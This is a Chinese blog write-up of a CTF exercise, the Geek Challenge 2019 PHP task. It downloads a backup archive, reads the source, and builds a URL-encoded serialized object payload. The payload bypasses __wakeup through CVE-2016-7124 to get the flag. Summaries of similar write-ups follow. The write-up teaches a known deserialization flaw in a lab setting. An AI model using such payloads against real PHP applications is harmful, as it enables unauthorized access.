极客大挑战2019PHP——反序列化

已于 2023-10-31 10:43:56 修改
阅读量82 收藏
点赞数 1
文章标签: php 网络安全 安全 web安全
于 2023-10-31 10:42:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WSX_ASD/article/details/134134767
版权

扫描目录发现www.zip文件,然后进行下载

 下载后解压查看核心代码

index.php

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

通过GET方式接收变量$select,再将$select反序列化操作赋值给变量$res

class.php

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();          
        }
    }
}

通过分析代码只需要满足username === 'admin'即可得到flag,在对象创建时__construct()给$username和$password赋值,销毁时调用__destruct()方法,所以我们只需要使password = 100 并且 username ='admin',所以构造payload

<?php
class Name
{
    private $username = 'admin';
    private $password = 100;
}

$a = new Name();
echo serialize($a);
?>

输出结果

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

再urlencode()

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

使用get方法给select传参

没反应,回去看index.php中发现,在接收到select变量时进行了unserialize(),所以触法__wakeup()方法所以将$username值强行改为了'guest',所以我们需要了解一个漏洞CVE-2016-7124

CVE-2016-7124

漏洞影响版本:

PHP5 < 5.6.25

PHP7 < 7.0.10

漏洞产生原因: 如果存在wakeup方法,调用 unserilize() 方法前则先调用wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行

所以我们重新构造payload,只需要将下面这个

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

变量个数改成大于2的数字即可

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
所以最终的payload为
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
获得flag

 

注意

在修改payload时,如果先把

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

中的2改为比2大的数字,再进行urlencode是不对的,因为private 属性序列化的时候格式是%00 类名%00 成员名,是不显示的,所以要先进行urlencode,然后再更改.

WSX_ASD
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 4777
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 297
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
[极客挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 494
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3727
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BUUCTF[极客挑战 2019]PHP——wp
nzw1134864657的博客
01-04 158
通过目录扫描发现有www.zip 访问/www.zip 直接下载安装包 先看一下index.php里的PHP的相关内容 关键点在select,这是一个可控的变量 再看一下class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __const
第十五题——[极客挑战 2019]PHP
分享简单的安全技术
04-05 229
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,提示为备份文件 第二步:网站备份文件一般放置在www.zip里,访问www.zip得到一个下载提示,下载后得到class.php与index.php 第三步:查看flag.php 什么也没有 第四步:查看index.php 通过index.php得知,index加载了class.php文件并传入一个select参数,然后反序列化。 第五步:查看class.php 由函数_destruct可知当usernam
BUUCTF--极客挑战php
woshicainiao666的博客
03-06 1181
www.zip。
【BUUCTF】[极客挑战 2019]PHP
aoao331198的博客
04-06 932
打开网站提示说有备份文件 dirsearch扫描 下载www.zip查看 重要文件class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&
[极客挑战 2019]PHP1
m0_67878917的博客
07-19 88
我们如上图改变序列化输出结果,这个改变的数字代表了序列化对象所属的类的属性个数,因为有username和password两个属性,故值为2,当我们将其换成任意一个比2大的数时,wakeup函数就不会被调用。扫出来一个文件,下载解压发现三个php文件,flag.php(假的),class.php,index.php。可以看到一个get方式传参select,然后对这个参数使用反序列化函数unserialize()。如上图所示,将$obj用serialize函数序列化并输出(记住这个图,后面要考)
第三届ApacheFlink极客挑战赛暨AAIGCUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
10-23
【标题】中的“第三届Apache Flink极客挑战赛”是一个以大数据实时处理技术Apache Flink为核心的竞赛,旨在推动Flink技术在业界的应用和发展。而“电商推荐‘抱大腿’攻击识别”则是比赛的具体主题,涉及到了电子...
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
最新发布
06-23
2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。...
竞赛资料源码-第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
01-24
RoboMaster、RoboCon、“西门子杯”中国智能制造挑战赛、中国大学生计算机设计大赛、世界技能大赛、中国高校计算机大赛-大数据挑战赛、团体程序设计天梯赛、移动应用创新赛、网络技术挑战赛、全国大学生信息安全竞赛...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ApacheFlink极客挑战赛垃圾图片分类赛道冠军方案分享.pdf
01-09
在"Apache Flink极客挑战赛垃圾图片分类赛道冠军方案分享"中,参赛者利用Flink的高效处理能力来解决图像分类问题,特别是在智慧城市和互联网应用中,这种技术具有广泛的应用潜力。 1.1 Flink与Intel Analytics Zoo...
极客学院简单demo——天气预报
07-17
一个简单的天气项目
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值